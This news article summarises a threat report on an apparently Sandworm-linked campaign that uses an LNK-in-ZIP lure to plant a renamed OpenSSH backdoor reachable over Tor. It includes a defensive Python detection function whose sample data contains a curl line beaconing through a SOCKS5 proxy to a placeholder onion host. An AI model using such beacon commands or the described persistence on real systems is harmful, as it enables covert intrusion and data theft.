
The malicious archive was explicitly designed to lure personnel from the Belarusian Special Operations Command specializing in UAV and drone operations, suggesting targeted intelligence collection on regional military capabilities.
Advanced Multi-Stage Infection Chain
The attack begins with a ZIP file containing a Windows shortcut (LNK) disguised as a legitimate PDF. When executed, the LNK triggers embedded PowerShell commands that extract another hidden archive, install payloads under %appdata%\logicpro, and execute obfuscated scripts.
These scripts validate system conditions, such as the number of LNK files and active processes, to evade sandbox detection before proceeding with infection.

After the environmental checks, a decoy PDF opens to maintain user trust while the malware silently establishes persistence through a scheduled task.
This task creates two key services on the infected host: a backdoor enabled via OpenSSH for Windows, and an anonymized communication layer via the Tor network, enhanced with obfs4 traffic obfuscation technology.
SSH and Tor-Based Covert Access
CRIL’s analysis revealed that the malware deploys githubdesktop.exe, a renamed Microsoft-signed OpenSSH executable configured to run an SSH service on port 20321 using RSA key-based authentication only.
The configuration file restricts access to preloaded authorized keys, ensuring only the attacker’s private key can authenticate. An SFTP subsystem (ebay.exe) facilitates file transfer and exfiltration operations.
The second scheduled task launches a customized Tor binary (pinterest.exe) configured to host an onion service linked to the SSH, RDP, and SMB ports, providing the threat actor with remote desktop access, secure file transfer, and network share exploration.
The obfs4 plugin (confluence.exe) disguises all Tor traffic as regular network communication, effectively concealing activity from traditional monitoring systems.
Data exfiltration occurs via a curl command routed through a SOCKS5 proxy, transmitting the host’s unique onion address and campaign identifiers to the command-and-control infrastructure.
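As an added example, not part of the CRIL report or this article, the following Python triage function flags the telemetry pattern described above: a signed OpenSSH or Tor binary running under a decoy name, execution staged under %appdata%\logicpro, a listener on port 20321, and curl routed through a SOCKS5 proxy. Field names follow Sysmon process-creation conventions (Image, OriginalFileName, CommandLine); the listen/Port record shape, the set of genuine tool names, and the sample events are constructed assumptions.

```python
import ntpath
import re
from typing import Dict, List, Tuple

# Assumed genuine file names of the tools the report says were renamed.
ORIGINAL_NAMES = {"sshd.exe", "sftp-server.exe", "tor.exe", "obfs4proxy.exe"}
SUSPECT_DIR = r"\appdata\roaming\logicpro"   # expanded %appdata%\logicpro
SSH_PORT = 20321                               # non-standard sshd port in the report
CURL_SOCKS = re.compile(r"\bcurl(\.exe)?\b.*\bsocks5h?://", re.IGNORECASE)


def triage(events: List[Dict[str, str]]) -> List[Tuple[str, str]]:
    """Return (rule, evidence) pairs for events matching the backdoor pattern."""
    hits = []
    for ev in events:
        image = ev.get("Image", "")
        base = ntpath.basename(image).lower()
        original = ev.get("OriginalFileName", "").lower()
        cmd = ev.get("CommandLine", "")
        # 1. On-disk name differs from the version-resource OriginalFileName
        #    (e.g. githubdesktop.exe that is really sshd.exe).
        if original in ORIGINAL_NAMES and base != original:
            hits.append(("renamed_tool", f"{base} is really {original}"))
        # 2. Image or command line points into the staging directory.
        if SUSPECT_DIR in (image + " " + cmd).lower():
            hits.append(("appdata_staging", image or cmd))
        # 3. Any process listening on the report's sshd port (constructed record shape).
        if ev.get("EventType") == "listen" and ev.get("Port") == str(SSH_PORT):
            hits.append(("ssh_on_20321", f"{base} listening on {SSH_PORT}"))
        # 4. curl pushed through a SOCKS5 proxy, the exfiltration beacon pattern.
        if CURL_SOCKS.search(cmd):
            hits.append(("curl_via_socks5", cmd))
    return hits


# Constructed sample telemetry, not taken from the report.
SAMPLE_EVENTS = [
    {"Image": r"C:\Users\u\AppData\Roaming\logicpro\githubdesktop.exe",
     "OriginalFileName": "sshd.exe", "CommandLine": "githubdesktop.exe -f sshd_config"},
    {"Image": r"C:\Users\u\AppData\Roaming\logicpro\githubdesktop.exe",
     "EventType": "listen", "Port": "20321"},
    {"Image": r"C:\Windows\System32\curl.exe",
     "CommandLine": "curl.exe -x socks5h://127.0.0.1:9050 http://placeholder.onion/ -d id=x"},
    {"Image": r"C:\Program Files\Git\usr\bin\ssh.exe", "OriginalFileName": "ssh.exe",
     "CommandLine": "ssh.exe -p 22 user@host"},   # benign: name matches, standard port
]

if __name__ == "__main__":
    for rule, evidence in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {evidence}")
```

The OriginalFileName check is the most durable of the four, since it does not depend on the specific decoy names or port chosen for one campaign.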

CRIL successfully replicated the attack and established SSH connectivity, confirming full remote access capability via the Tor-anonymized channel.
Although no secondary payloads were detected, researchers assess with moderate confidence that this intrusion shares technical links with the December 2024 Sandworm (APT44/UAC-0125) campaign.
The obfs4 integration, pre-generated RSA keys, and improved persistence mechanisms mark an evolution of Sandworm’s tactics, emphasizing continued adaptation in state-backed cyber espionage targeting Eastern European military assets.
The post Hackers Hide SSH-Tor Backdoor Inside Weaponized Military ZIP Documents appeared first on Cyber Security News.
